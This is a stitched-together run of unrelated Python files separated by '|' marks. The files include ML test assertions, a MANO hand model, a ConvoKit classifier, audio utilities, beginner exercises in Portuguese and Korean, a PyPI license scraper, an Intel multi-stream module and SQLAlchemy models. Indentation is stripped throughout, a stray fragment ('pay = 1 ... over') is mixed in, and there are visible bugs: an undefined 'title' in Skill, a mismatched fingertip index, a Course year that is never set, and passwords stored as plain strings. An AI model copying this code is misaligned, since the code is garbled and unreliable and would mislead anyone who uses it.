#Check that the weights are being updated (i.e. check if original weights before training and new weights are NOT equal)
comparison = original_weights==new_weights
arrays_are_equal = comparison.all() #compares all array values to make sure they are equal at the same indices
assert arrays_are_equal==False
#Check that reasonable estimates are given for NSCLC classification (i.e. all values are between 0 and 1)
y_pred = log_model.make_prediction(X_val)
assert np.amin(y_pred)>=0
assert np.amax(y_pred)<=1
# Check accuracy of model after training
y_classified = y_pred
#use cutoff value of 0.5 for binary classification
for i in range(0,len(y_pred)):
if y_pred[i]<0.5:
y_classified[i] = 0
else:
y_classified[i] = 1
def accuracy(y_classified, y_val):
#calculate how many correct predictions there were and divide by total # of predictions
accuracy = np.sum(y_val==y_classified)/len(y_val)
return accuracy
#accuracy for the above hyperparameters should generally be within the range of 0.845 to 0.865
assert accuracy(y_classified, y_val)<=0.865
assert accuracy(y_classified, y_val)>=0.845
pass |
import numpy as np
import torch
import os.path as osp
import json
from core.config import cfg
from manopth.manolayer import ManoLayer
class MANO(object):
def __init__(self):
self.layer = self.get_layer()
self.vertex_num = 778
self.face = self.layer.th_faces.numpy()
self.joint_regressor = self.layer.th_J_regressor.numpy()
self.joint_num = 21
self.joints_name = ('Wrist', 'Thumb_1', 'Thumb_2', 'Thumb_3', 'Thumb_4', 'Index_1', 'Index_2', 'Index_3', 'Index_4', 'Middle_1', 'Middle_2', 'Middle_3', 'Middle_4', 'Ring_1', 'Ring_2', 'Ring_3', 'Ring_4', 'Pinky_1', 'Pinky_2', 'Pinky_3', 'Pinky_4')
self.skeleton = ( (0,1), (0,5), (0,9), (0,13), (0,17), (1,2), (2,3), (3,4), (5,6), (6,7), (7,8), (9,10), (10,11), (11,12), (13,14), (14,15), (15,16), (17,18), (18,19), (19,20) )
self.root_joint_idx = self.joints_name.index('Wrist')
# add fingertips to joint_regressor
self.fingertip_vertex_idx = [745, 317, 444, 556, 673] # mesh vertex idx (right hand)
thumbtip_onehot = np.array([1 if i == 745 else 0 for i in range(self.joint_regressor.shape[1])], dtype=np.float32).reshape(1,-1)
indextip_onehot = np.array([1 if i == 317 else 0 for i in range(self.joint_regressor.shape[1])], dtype=np.float32).reshape(1,-1)
middletip_onehot = np.array([1 if i == 445 else 0 for i in range(self.joint_regressor.shape[1])], dtype=np.float32).reshape(1,-1)
ringtip_onehot = np.array([1 if i == 556 else 0 for i in range(self.joint_regressor.shape[1])], dtype=np.float32).reshape(1,-1)
pinkytip_onehot = np.array([1 if i == 673 else 0 for i in range(self.joint_regressor.shape[1])], dtype=np.float32).reshape(1,-1)
self.joint_regressor = np.concatenate((self.joint_regressor, thumbtip_onehot, indextip_onehot, middletip_onehot, ringtip_onehot, pinkytip_onehot))
self.joint_regressor = self.joint_regressor[[0, 13, 14, 15, 16, 1, 2, 3, 17, 4, 5, 6, 18, 10, 11, 12, 19, 7, 8, 9, 20],:]
def get_layer(self):
return ManoLayer(mano_root=osp.join(cfg.mano_dir, 'mano', 'models'), flat_hand_mean=False, use_pca=False) # load right hand MANO model
|
from convokit import Corpus, CorpusObject
from sklearn.model_selection import train_test_split, cross_val_score, KFold
from typing import Callable, List
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import StandardScaler
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import confusion_matrix, classification_report
import pandas as pd
from scipy.sparse import vstack, issparse
from .classifier import Classifier
import numpy as np
from .util import extract_feats_and_label_bow
class BoWClassifier(Classifier):
"""
Transformer that trains a classifier on the Corpus objects' text vector representation (e.g. bag-of-words, TF-IDF, etc)
Runs on the Corpus's Users, Utterances, or Conversations (as specified by obj_type)
Inherits from `Classifier` and has access to its methods.
:param obj_type: "speaker", "utterance", or "conversation"
:param vector_name: the metadata key where the Corpus object text vector is stored
:param labeller: a (lambda) function that takes a Corpus object and returns True (y=1) or False (y=0) - i.e. labeller defines the y value of the object for fitting
:param clf: a sklearn Classifier. By default, clf is a Pipeline with StandardScaler and LogisticRegression
:param clf_feat_name: the metadata key to store the classifier prediction value under; default: "prediction"
:param clf_prob_feat_name: the metadata key to store the classifier prediction score under; default: "pred_score"
"""
def __init__(self, obj_type: str, vector_name="bow_vector",
labeller: Callable[[CorpusObject], bool] = lambda x: True,
clf=None, clf_feat_name: str = "prediction", clf_prob_feat_name: str = "pred_score"):
if clf is None:
print("Initializing default classification model (standard scaled logistic regression)")
clf = Pipeline([("standardScaler", StandardScaler(with_mean=False)),
("logreg", LogisticRegression(solver='liblinear'))])
self.vector_name = vector_name
super().__init__(obj_type=obj_type, pred_feats=[], labeller=labeller,
clf=clf, clf_feat_name=clf_feat_name, clf_prob_feat_name=clf_prob_feat_name)
def fit(self, corpus: Corpus, y=None, selector: Callable[[CorpusObject], bool] = lambda x: True):
"""
Fit the Transformer's internal classifier model on the Corpus objects, with an optional selector that filters for objects to be fit on.
:param corpus: the target Corpus
:param selector: a (lambda) function that takes a Corpus object and returns True or False (i.e. include / exclude). By default, the selector includes all objects of the specified type in the Corpus.
:return: the fitted BoWClassifier
"""
# collect texts for vectorization
X = []
y = []
for obj in corpus.iter_objs(self.obj_type, selector):
X.append(obj.meta[self.vector_name])
y.append(self.labeller(obj))
if issparse(X[0]): # for csr_matrix
X = vstack(X)
else: # for non-compressed numpy arrays
X = np.vstack(X)
self.clf.fit(X, y)
return self
def transform(self, corpus: Corpus, selector: Callable[[CorpusObject], bool] = lambda x: True) -> Corpus:
"""
Annotate the corpus objects with the classifier prediction and prediction score, with an optional selector
that filters for objects to be classified. Objects that are not selected will get a metadata value of 'None'
instead of the classifier prediction.
:param corpus: the target Corpus
:param selector: a (lambda) function that takes a Corpus object and returns True or False (i.e. include / exclude). By default, the selector includes all objects of the specified type in the Corpus.
:return: the target Corpus annotated
"""
objs = []
X = []
for obj in corpus.iter_objs(self.obj_type):
if selector(obj):
objs.append(obj)
X.append(obj.meta[self.vector_name])
else:
obj.add_meta(self.clf_feat_name, None)
obj.add_meta(self.clf_prob_feat_name, None)
X = vstack(X)
clfs, clfs_probs = self.clf.predict(X), self.clf.predict_proba(X)[:, 1]
for idx, (clf, clf_prob) in enumerate(list(zip(clfs, clfs_probs))):
obj = objs[idx]
obj.add_meta(self.clf_feat_name, clf)
obj.add_meta(self.clf_prob_feat_name, clf_prob)
return corpus
def transform_objs(self, objs: List[CorpusObject]) -> List[CorpusObject]:
"""
Run classifier on list of Corpus objects and annotate them with the predictions and prediction scores
:param objs: list of Corpus objects
:return: list of annotated Corpus objects
"""
X, _ = extract_feats_and_label_bow(corpus=None, objs=objs, obj_type=None, vector_name=self.vector_name,
labeller=self.labeller, selector=None)
X = X.toarray()
# obj_ids = [obj.id for obj in objs]
clfs, clfs_probs = self.clf.predict(X), self.clf.predict_proba(X)[:, 1]
for idx, (clf, clf_prob) in enumerate(list(zip(clfs, clfs_probs))):
obj = objs[idx]
obj.add_meta(self.clf_feat_name, clf)
obj.add_meta(self.clf_prob_feat_name, clf_prob)
return objs
def fit_transform(self, corpus: Corpus, y=None, selector: Callable[[CorpusObject], bool] = lambda x: True) -> Corpus:
self.fit(corpus, selector=selector)
return self.transform(corpus, selector=selector)
def summarize(self, corpus: Corpus, selector: Callable[[CorpusObject], bool] = lambda x: True):
"""
Generate a DataFrame indexed by object id with the classifier predictions and scores
:param corpus: the annotated Corpus
:param selector: a (lambda) function that takes a Corpus object and returns True or False (i.e. include / exclude). By default, the selector includes all objects of the specified type in the Corpus.
:return: a pandas DataFrame
"""
objId_clf_prob = []
for obj in corpus.iter_objs(self.obj_type, selector):
objId_clf_prob.append((obj.id, obj.meta[self.clf_feat_name], obj.meta[self.clf_prob_feat_name]))
return pd.DataFrame(list(objId_clf_prob),
columns=['id', self.clf_feat_name, self.clf_prob_feat_name])\
.set_index('id').sort_values(self.clf_prob_feat_name, ascending=False)
def summarize_objs(self, objs: List[CorpusObject]):
"""
Generate a pandas DataFrame (indexed by object id, with prediction and prediction score columns) of classification results.
Runs on a list of Corpus objects.
:param objs: list of Corpus objects
:return: pandas DataFrame indexed by Corpus object id
"""
objId_clf_prob = []
for obj in objs:
objId_clf_prob.append((obj.id, obj.meta[self.clf_feat_name], obj.meta[self.clf_prob_feat_name]))
return pd.DataFrame(list(objId_clf_prob),
columns=['id', self.clf_feat_name, self.clf_prob_feat_name]).set_index('id').sort_values(self.clf_prob_feat_name)
def evaluate_with_train_test_split(self, corpus: Corpus = None,
objs: List[CorpusObject] = None,
selector: Callable[[CorpusObject], bool] = lambda x: True,
test_size: float = 0.2):
"""
Evaluate the performance of predictive features (Classifier.pred_feats) in predicting for the label,
using a train-test split.
Run either on a Corpus (with Classifier labeller, selector, obj_type settings) or a list of Corpus objects
:param corpus: target Corpus
:param objs: target list of Corpus objects
:param selector: if running on a Corpus, this is a (lambda) function that takes a Corpus object and returns True or False (i.e. include / exclude). By default, the selector includes all objects of the specified type in the Corpus.
:param test_size: size of test set
:return: accuracy and confusion matrix
"""
X, y = extract_feats_and_label_bow(corpus, objs, self.obj_type, self.vector_name, self.labeller, selector)
print("Running a train-test-split evaluation...")
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=test_size)
self.clf.fit(X_train, y_train)
preds = self.clf.predict(X_test)
accuracy = np.mean(preds == y_test)
print("Done.")
return accuracy, confusion_matrix(y_true=y_test, y_pred=preds)
def evaluate_with_cv(self, corpus: Corpus = None,
objs: List[CorpusObject] = None,
cv=KFold(n_splits=5),
selector: Callable[[CorpusObject], bool] = lambda x: True
):
"""
Evaluate the performance of predictive features (Classifier.pred_feats) in predicting for the label,
using cross-validation for data splitting.
Run either on a Corpus (with Classifier labeller, selector, obj_type settings) or a list of Corpus objects.
:param corpus: target Corpus
:param objs: target list of Corpus objects (do not pass in corpus if using this)
:param cv: cross-validation model to use: KFold(n_splits=5) by default.
:param selector: if running on a Corpus, this is a (lambda) function that takes a Corpus object and returns True or False (i.e. include / exclude). By default, the selector includes all objects of the specified type in the Corpus.
:return: cross-validated accuracy score
"""
X, y = extract_feats_and_label_bow(corpus, objs, self.obj_type, self.vector_name, self.labeller, selector)
print("Running a cross-validated evaluation...")
score = cross_val_score(self.clf, X, y, cv=cv)
print("Done.")
return score
|
"""
Utility functions for hear-kit
"""
import numpy as np
from tqdm import tqdm
from typing import Tuple
import torch
import torch.nn.functional as F
from torch import Tensor
def compute_scene_stats(audios, to_melspec):
mean = 0.
std = 0.
for audio in audios:
# Compute log-mel-spectrogram
lms = (to_melspec(audio) + torch.finfo(torch.float).eps).log()
# Compute mean, std
mean += lms.mean()
std += lms.std()
mean /= len(audios)
std /= len(audios)
stats = [mean.item(), std.item()]
return stats
def compute_timestamp_stats(melspec):
"""Compute statistics of the mel-spectrograms.
Parameters
----------
melspec : Tensor of shape (n_sounds*n_frames, n_mels, time)
Returns
-------
list containing the mean and the standard deviation of the mel-spectrograms"""
# Compute mean, std
mean = melspec.mean()
std = melspec.std()
mean /= len(melspec)
std /= len(melspec)
stats = [mean.item(), std.item()]
return stats
def frame_audio(
audio: Tensor, frame_size: int, hop_size: float, sample_rate: int
) -> Tuple[Tensor, Tensor]:
"""
Adapted from https://github.com/neuralaudio/hear-baseline/hearbaseline/
Slices input audio into frames that are centered and occur every
sample_rate * hop_size samples. We round to the nearest sample.
Args:
audio: input audio, expects a 2d Tensor of shape:
(n_sounds, num_samples)
frame_size: the number of samples each resulting frame should be
hop_size: hop size between frames, in milliseconds
sample_rate: sampling rate of the input audio
Returns:
- A Tensor of shape (n_sounds, num_frames, frame_size)
- A Tensor of timestamps corresponding to the frame centers with shape:
(n_sounds, num_frames).
"""
# Zero pad the beginning and the end of the incoming audio with half a frame number
# of samples. This centers the audio in the middle of each frame with respect to
# the timestamps.
audio = F.pad(audio, (frame_size // 2, frame_size - frame_size // 2))
num_padded_samples = audio.shape[1]
frame_step = hop_size / 1000.0 * sample_rate
frame_number = 0
frames = []
timestamps = []
frame_start = 0
frame_end = frame_size
while True:
frames.append(audio[:, frame_start:frame_end])
timestamps.append(frame_number * frame_step / sample_rate * 1000.0)
# Increment the frame_number and break the loop if the next frame end
# will extend past the end of the padded audio samples
frame_number += 1
frame_start = int(round(frame_number * frame_step))
frame_end = frame_start + frame_size
if not frame_end <= num_padded_samples:
break
# Expand out the timestamps to have shape (n_sounds, num_frames)
timestamps_tensor = torch.tensor(timestamps, dtype=torch.float32)
timestamps_tensor = timestamps_tensor.expand(audio.shape[0], -1)
return torch.stack(frames, dim=1), timestamps_tensor
def generate_byols_embeddings(
model,
audios,
to_melspec,
normalizer):
"""
Generate audio embeddings from a pretrained feature extractor.
Converts audios to float, resamples them to the desired learning_rate,
and produces the embeddings from a pre-trained model.
Adapted from https://github.com/google-research/google-research/tree/master/non_semantic_speech_benchmark
Parameters
----------
model : torch.nn.Module object or a tensorflow "trackable" object
Model loaded with pre-training weights
audios : list
List of audios, loaded as a numpy arrays
to_melspec : torchaudio.transforms.MelSpectrogram object
Mel-spectrogram transform to create a spectrogram from an audio signal
normalizer : nn.Module
Pre-normalization transform
device : torch.device object
Used device (CPU or GPU)
Returns
----------
embeddings: Tensor
2D Array of embeddings for each audio of size (N, M). N = number of samples, M = embedding dimension
"""
embeddings = []
model.eval()
for param in model.parameters():
param.requires_grad = False
with torch.no_grad():
for audio in tqdm(audios, desc=f'Generating Embeddings...', total=len(audios)):
lms = normalizer((to_melspec(audio.unsqueeze(0)) + torch.finfo(torch.float).eps).log()).unsqueeze(0)
embedding = model(lms.to(audio.device))
embeddings.append(embedding)
embeddings = torch.cat(embeddings, dim=0)
return embeddings |
# Programa que usa uma lista chamada números e duas funções chamadas sorteia() e somaPar(). A primeira função
# vai sortear 5 números e vai colocá-los dentro da lista e a segunda função mostra a soma entre todos os valores
# pares sorteados pela função anterior.
from random import randint
numerossorteados = []
def sorteia(numerossorteados):
print(f'Sorteando 5 valores na lista: ', end='')
for i in range(0, 5, 1):
numerossorteados.append(randint(1, 10))
print(f'{numerossorteados[i]} ', end='')
# end-if
print('PRONTO!')
# end-def
def somapar(numerossorteados):
soma = 0
for i in numerossorteados:
if i % 2 == 0:
soma = soma + i
# end-if
# end-for
print(f'O resultado da soma dos pares é: {soma}')
# end-def
# Programa Principal
numerossorteados = []
sorteia(numerossorteados)
somapar(numerossorteados)
|
import json
import requests
import bs4
def get_license(package):
package = package.lower()
r = requests.get('https://pypi.org/project/'+package)
soup = bs4.BeautifulSoup(r.text, features="html.parser")
for link in soup.find_all('p'):
text = link.get_text()
#print(text)
if "License:" in text:
text = text.replace('License: ','')
#print (text)
#text = text.replace(',',' | ')
return text
def merge_python_output():
with open('python_license_list.csv') as file:
lines = file.readlines()
#print (lines)
with open('DistroName') as file:
name = file.read().strip()
if name == 'centos' or name=='fedora':
file_name = 'final_output/remaining_list.csv'
else:
file_name = 'input_package_list.csv'
for line in lines:
if "---" in line:
continue
package_name, license_name = line.split(',')[0].strip() , line.split(',')[1].strip()
with open('final_output/Final_license_list.csv','a+') as file:
with open(file_name,'a') as rfile:
if license_name in ["NONE", "UNKNOWN"]:
#print(package_name, license_name)
try:
license_name = get_license(package_name)
file.write(package_name + " | | " + license_name + "|pypi.org | NA| NA\n")
except:
rfile.write(package_name +"\n")
else:
file.write(package_name + " | | " + license_name + "| pip_command | NA| NA\n")
|
import torch
import torch.nn as nn
import intel_extension_for_pytorch as ipex
from .cpupool import CPUPool
class MultiStreamModule(nn.Module):
r"""
MultiStreamModule supports inference with multi-stream throughput mode.
If the number of cores inside ``cpu_pool`` is divisible by ``num_streams``,
the cores will be allocated equally to each stream.
If the number of cores inside ``cpu_pool`` is not divisible by
``num_streams`` with remainder N, one extra core will be allocated to the
first N streams.
Args:
model (torch.jit.ScriptModule or torch.nn.Module): The input model.
num_streams (int): Number of instances.
cpu_pool (intel_extension_for_pytorch.cpu.runtime.CPUPool): An
intel_extension_for_pytorch.cpu.runtime.CPUPool object, contains
all CPU cores used to run multi-stream inference.
concat_output (bool): A flag indicates whether the output of each
stream will be concatenated or not. The default value is True. Note:
if the output of each stream can't be concatenated, set this flag to
false to get the raw output (a list of each stream's output).
Returns:
intel_extension_for_pytorch.cpu.runtime.MultiStreamModule: Generated
intel_extension_for_pytorch.cpu.runtime.MultiStreamModule object.
:meta public:
"""
def __init__(self, model, num_streams: int, cpu_pool: CPUPool, concat_output: bool = True):
super(MultiStreamModule, self).__init__()
assert type(cpu_pool) is CPUPool
self.core_list = cpu_pool.core_ids
self.num_streams = num_streams
if self.num_streams == 1:
# Sync execution path if num_stream is 1.
self.model = model
else:
self.cores_per_instance = self.core_list.__len__() // self.num_streams
num_stream_allocated_extra_core = self.core_list.__len__() % self.num_streams
self.tasks = []
start_core_list_idx = 0
end_core_list_idx = 0
for j in range(self.num_streams):
if j < num_stream_allocated_extra_core:
# If the core number is not divisible by stream number,
# the remainder streams(num_stream_allocated_extra_core) will be allocated one extra core.
end_core_list_idx += (self.cores_per_instance + 1)
else:
end_core_list_idx += self.cores_per_instance
self.tasks.append(ipex.cpu.runtime.Task(model, ipex.cpu.runtime.CPUPool(self.core_list[start_core_list_idx:end_core_list_idx])))
start_core_list_idx = end_core_list_idx
self.concat_output = concat_output
def forward(self, inputs):
if self.num_streams == 1:
# Sync execution path if num_stream is 1
if not ipex._C.is_same_core_affinity_setting(self.core_list):
# If the main thread's core affinity has been changed, we should set it again.
ipex._C.pin_cpu_cores(self.core_list)
results_raw = self.model(inputs)
return results_raw if self.concat_output else [results_raw]
# Ensure each instance has input offload
batch_per_instance = inputs.size(0) // self.num_streams
if batch_per_instance >= 1:
# The input batchsize larger or equal to num_streams.
used_num_streams = self.num_streams
# If input batchsize larger than num_streams and not divisible,
# the first remainder streams will have (mini_batch + 1) input size.
instance_need_extra_input = inputs.size(0) % self.num_streams
else:
# The input batchsize less than num_streams,
# only the first batchsize stream will have mini_batch(1) input.
batch_per_instance = 1
used_num_streams = inputs.size(0)
instance_need_extra_input = 0
results_raw_future = []
results_raw = []
start_idx = 0
end_idx = 0
for j in range(used_num_streams):
if j < instance_need_extra_input:
# Tail case, when the input image size larger than num_streams and not divisible,
# the first remainder streams will have (mini_batch + 1) input size.
end_idx = end_idx + (batch_per_instance + 1)
else:
# Input image size divisible of num_streams or input image size less than num_streams.
end_idx = end_idx + batch_per_instance
results_raw_future.append(self.tasks[j](inputs[start_idx:end_idx]))
start_idx = end_idx
for j in range(used_num_streams):
results_raw.append(results_raw_future[j].get())
return torch.cat(results_raw) if self.concat_output else results_raw
|
from estrategias.jogadores import Jogador
from statistics import median
from random import choice
class MeuJogador(Jogador):
def escolha_de_cacada(self, rodada, comida_atual, reputacao_atual, m, reputacoes_dos_jogadores):
media = sum(reputacoes_dos_jogadores)/len(reputacoes_dos_jogadores)
vivos = len(reputacoes_dos_jogadores)
mediana = median(reputacoes_dos_jogadores)
if rodada < 100:
escolhas = [choice(['d','c']) for x in reputacoes_dos_jogadores]
elif m <= vivos or comida_atual > 1500 or mediana > 0.49:
escolhas = ['d' for x in reputacoes_dos_jogadores]
elif (comida_atual > 1000 and comida_atual < 1499) and media < 0.49:
escolhas = ['c' for x in reputacoes_dos_jogadores]
return escolhas |
pay = 1
pay = 2
pay = 3
over
|
import sqlite3 as sql
import sys
import cgi
import json
from flask import Flask, jsonify
app = Flask(__name__)
print("worked")
sys.stdout.write("Content-Type: application/json")
sys.stdout.write("\n")
sys.stdout.write("\n")
form = cgi.FieldStorage()
print("worked")
#sys.stdout.write(json.dumps({ 'data': form.getvalue('ac_number')}))
with sql.connect('coursesys.db') as db:
c = db.cursor()
addTeam = """UPDATE Capstone_Team_Members
SET Team_Number = ?
WHERE student_email = ?"""
# c.execute(addTeam, (number[0],number[1])) |
import os
import sys
import unittest
from tempfile import mkstemp
from nbformat import reads
from nbmerge import merge_notebooks, main, parse_plan, annotate_source_path
SELF_DIR = os.path.abspath(os.path.dirname(__file__))
FIXTURES_DIR = os.path.join(SELF_DIR, "fixtures")
TARGET_NBS = [os.path.join(FIXTURES_DIR, file_name + ".ipynb")
for file_name in ("1_Intro", "2_Middle", "3_Conclusion")]
def file_names_from(file_paths):
return [os.path.basename(f) for f in file_paths]
class TestMerge(unittest.TestCase):
def setUp(self):
if not hasattr(sys.stdout, "getvalue"):
self.fail("need to run in buffered mode")
def _validate_merged_three(self, merged):
self.assertEqual(len(merged.cells), 6)
self.assertEqual(merged.metadata['test_meta']['title'], "Page 1")
self.assertEqual(merged.metadata['final_answer'], 42)
def test_merge_defaults(self):
self._validate_merged_three(merge_notebooks(FIXTURES_DIR, TARGET_NBS))
def test_merge_verbose(self):
nb = merge_notebooks(FIXTURES_DIR, TARGET_NBS, verbose=True)
self._validate_merged_three(nb)
lines = sys.stdout.getvalue().splitlines()
self.assertEqual(lines[0].strip(), "Merging notebooks...")
for target, line in zip(TARGET_NBS, lines[1:4]):
self.assertEqual(line.strip(), "Reading `{}`".format(target))
def test_merge_with_boundary_key(self):
nb = merge_notebooks(FIXTURES_DIR, TARGET_NBS, boundary_key='xxx')
self._validate_merged_three(nb)
self.assertEqual(nb.cells[0].metadata['xxx'], '1_Intro.ipynb')
self.assertEqual(nb.cells[2].metadata['xxx'], '2_Middle.ipynb')
self.assertEqual(nb.cells[4].metadata['xxx'], '3_Conclusion.ipynb')
def test_parse_plan(self):
header_nb = os.path.join(FIXTURES_DIR, "Header.ipynb")
plan = parse_plan([header_nb,
"-o", "myfile.ipynb",
"-p", "(_|1|2)_.*",
"-i", "-r", "-v"])
self.assertEqual(file_names_from(plan['notebooks']),
["Header.ipynb", "1_Intro.ipynb",
"1_Intro_In_Sub.ipynb", "2_Middle.ipynb"])
self.assertTrue(plan["verbose"])
self.assertEqual(plan["output_file"], "myfile.ipynb")
with self.assertRaises(IOError):
parse_plan(["this-file-doesn't-exist"])
def test_annotate_source_path(self):
nb_path = os.path.join(FIXTURES_DIR, "1_Intro.ipynb")
with open(nb_path, "r") as fp:
nb = reads(fp.read(), as_version=4)
annotate_source_path(nb, SELF_DIR, nb_path, "xylophone")
self.assertEqual(nb.cells[0].metadata['xylophone'],
os.path.join('fixtures', '1_Intro.ipynb'))
def test_main_to_stdout(self):
main(TARGET_NBS)
self._validate_merged_three(reads(sys.stdout.getvalue(), as_version=4))
def test_main_to_file(self):
_, path = mkstemp()
try:
main(TARGET_NBS + ["-o", path])
with open(path) as fp:
self._validate_merged_three(reads(fp.read(), as_version=4))
except:
os.unlink(path)
|
#!/usr/bin/env python3
"""PyTest tests for the get_datatype.py module.
"""
import os
import sys
sys.path.append(os.path.join(os.path.dirname(sys.path[0]),'amoebaelib')) # Customize.
from data.datatype_test_seqs import testseq1
from get_datatype import \
get_datatype_for_sequence_string, \
get_dbtype
def test_get_datatype_for_sequence_string():
"""Test the get_datatype_for_sequence_string function in the get_datatype.py file.
"""
##########################
# Arrange.
x1 = 'ATGC'*3 + 'Y'
x2 = 'atgc'*3 + 'y'
x3 = 'ATGCV'
x4 = 'atgcv'
x5 = 'tccaaaaaatcgaaTTATYttattccccaccttcttttctcattttttga'
x6 = testseq1
##########################
# Act.
dbtype_1 = get_datatype_for_sequence_string(x1)
dbtype_2 = get_datatype_for_sequence_string(x2)
dbtype_3 = get_datatype_for_sequence_string(x3)
dbtype_4 = get_datatype_for_sequence_string(x4)
dbtype_5 = get_datatype_for_sequence_string(x5)
dbtype_6 = get_datatype_for_sequence_string(x6)
##########################
# Assert.
assert dbtype_1 == 'nucl'
assert dbtype_2 == 'nucl'
assert dbtype_3 == 'prot'
assert dbtype_4 == 'prot'
assert dbtype_5 == 'nucl'
assert dbtype_6 == 'nucl'
def test_get_dbtype(): # ***Incomplete test
"""Test the get_dbtype function in the get_datatype.py file.
"""
##########################
# Arrange.
f = "f"
##########################
# Act.
#x = get_dbtype(f)
##########################
# Assert.
assert True == True # ***Temporary.
|
from ..resource import Resource
class LiveVideos(Resource):
def find(self, live_video_id:str):
return self._get(f"live_videos/{live_video_id}")
def all(self, applicant_id:str):
payload = {"applicant_id": applicant_id}
return self._get("live_videos/", payload=payload)
def download(self, live_video_id:str):
return self._download_request(f"live_videos/{live_video_id}/download")
def download_frame(self, live_video_id:str):
return self._download_request(f"live_videos/{live_video_id}/frame") |
# 함수로 정수 올림 한 값 리턴하기
x = float(input())
def f(key):
key = -int(-key//1)
return key
print(f(x))
print(f(x)) |
from .shared import db
student_skill = db.Table(
'student_skill', db.Model.metadata,
db.Column('rating', db.Integer, nullable=False),
db.Column('student_id', db.Integer, db.ForeignKey('student.id'), nullable=False),
db.Column('skill_id', db.Integer, db.ForeignKey('skill.id'), nullable=False)
)
course_skill = db.Table(
'course_skill', db.Model.metadata,
db.Column('course_id', db.Integer, db.ForeignKey('course.id'), nullable=False),
db.Column('skill_id', db.Integer, db.ForeignKey('skill.id'), nullable=False)
)
company_skill = db.Table(
'company_skill', db.Model.metadata,
db.Column('company_id', db.Integer, db.ForeignKey('company.id'), nullable=False),
db.Column('skill_id', db.Integer, db.ForeignKey('skill.id'), nullable=False)
)
project_skill = db.Table(
'project_skill', db.Model.metadata,
db.Column('project_id', db.Integer, db.ForeignKey('project.id'), nullable=False),
db.Column('skill_id', db.Integer, db.ForeignKey('skill.id'), nullable=False)
)
student_course = db.Table(
'student_course', db.Model.metadata,
db.Column('student_id', db.Integer, db.ForeignKey('student.id'), nullable=False),
db.Column('course_id', db.Integer, db.ForeignKey('course.id'), nullable=False)
)
student_project = db.Table(
'student_project', db.Model.metadata,
db.Column('student_id', db.Integer, db.ForeignKey('student.id'), nullable=False),
db.Column('project_id', db.Integer, db.ForeignKey('project.id'), nullable=False)
)
company_project = db.Table(
'company_project', db.Model.metadata,
db.Column('company_id', db.Integer, db.ForeignKey('company.id'), nullable=False),
db.Column('project_id', db.Integer, db.ForeignKey('project.id'), nullable=False)
)
class Company(db.Model):
__tablename__ = 'company'
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
name = db.Column(db.String())
url = db.Column(db.String())
logo_url = db.Column(db.String())
skills = db.relationship('Skill', secondary=company_skill, backref=db.backref('companies', lazy='dynamic'))
projects = db.relationship('Project', secondary=company_project, backref=db.backref('companies', lazy='dynamic'))
def __init__(self, name, url, logo_url):
self.name = name
self.url = url
self.logo_url = logo_url
def __repr__(self):
return '<Company %r>' % self.name
class University(db.Model):
__tablename__ = 'university'
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
name = db.Column(db.String())
country = db.Column(db.String())
state = db.Column(db.String())
city = db.Column(db.String())\
def __init__(self, name, country, state, city):
self.name = name
self.country = country
self.state = state
self.city = city
def __repr__(self):
return '<University %r>' % self.name
class Professor(db.Model):
__tablename__ = 'professor'
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
name = db.Column(db.String())
university_id = db.Column(db.Integer, db.ForeignKey('university.id'))
university = db.relationship('University')
def __init__(self, name, university):
self.name = name
self.university = university
def __repr__(self):
return '<Professor %r>' % self.name
class Course(db.Model):
__tablename__ = 'course'
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
name = db.Column(db.String())
year = db.Column(db.CHAR(4))
description = db.Column(db.Text)
projects_start_date = db.Column(db.Date)
projects_end_date = db.Column(db.Date)
university_id = db.Column(db.Integer, db.ForeignKey('university.id'))
professor_id = db.Column(db.Integer, db.ForeignKey('professor.id'))
university = db.relationship('University')
professor = db.relationship('Professor')
skills = db.relationship('Skill', secondary=course_skill, backref=db.backref('courses', lazy='dynamic'))
# students = db.relationship('Student', secondary=student_skill, backref=db.backref('courses', lazy='dynamic'))
def __init__(self, name, year, description, projects_start_date, projects_end_date, university, professor):
self.name = name
self.university = university
self.description = description
self.projects_start_date = projects_start_date
self.projects_end_date = projects_end_date
self.university = university
self.professor = professor
def __repr__(self):
return '<Course %r>' % self.name
class Project(db.Model):
__tablename__ = 'project'
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
title = db.Column(db.String())
summary = db.Column(db.Text)
details = db.Column(db.Text)
wordpress_url = db.Column(db.String())
course_id = db.Column(db.Integer, db.ForeignKey('course.id'))
course = db.relationship('Course')
skills = db.relationship('Skill', secondary=project_skill, backref=db.backref('projects', lazy='dynamic'))
# students = db.relationship('Student', secondary=student_project, backref=db.backref('projects', lazy='dynamic'))
# companies = db.relationship('Company', secondary=company_project, backref=db.backref('projects', lazy='dynamic'))
def __init__(self, title, summary, details, wordpress_url, course):
self.title = title
self.summary = summary
self.details = details
self.wordpress_url = wordpress_url
self.course = course
def __repr__(self):
return '<Project %r>' % self.name
class Skill(db.Model):
__tablename__ = 'skill'
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
name = db.Column(db.String())
category = db.Column(db.String())
def __init__(self, name, category):
self.title = title
self.category = category
def __repr__(self):
return '<Skill %r>' % self.name
class Student(db.Model):
__tablename__ = 'student'
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
name = db.Column(db.String())
dob = db.Column(db.Date)
linkedin_url = db.Column(db.String())
github_url = db.Column(db.String())
stackoverflow_url = db.Column(db.String())
start_date = db.Column(db.Date)
university_id = db.Column(db.Integer, db.ForeignKey('university.id'))
university = db.relationship('University')
skills = db.relationship('Skill', secondary=student_skill, backref=db.backref('students', lazy='dynamic'))
courses = db.relationship('Course', secondary=student_course, backref=db.backref('students', lazy='dynamic'))
projects = db.relationship('Project', secondary=student_project, backref=db.backref('students', lazy='dynamic'))
def __init__(self, name, dob, linkedin_url, github_url, stackoverflow_url, start_date, university):
self.name = name
self.dob = dob
self.linkedin_url = linkedin_url
self.github_url = github_url
self.stackoverflow_url = stackoverflow_url
self.start_date = start_date
self.university = university
def __repr__(self):
return '<Student %r>' % self.name
class Account(db.Model):
__tablename__ = 'account'
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
username = db.Column(db.String())
password = db.Column(db.String())
role = db.Column(db.String())
company_id = db.Column(db.Integer, db.ForeignKey('company.id'))
company = db.relationship('Company')
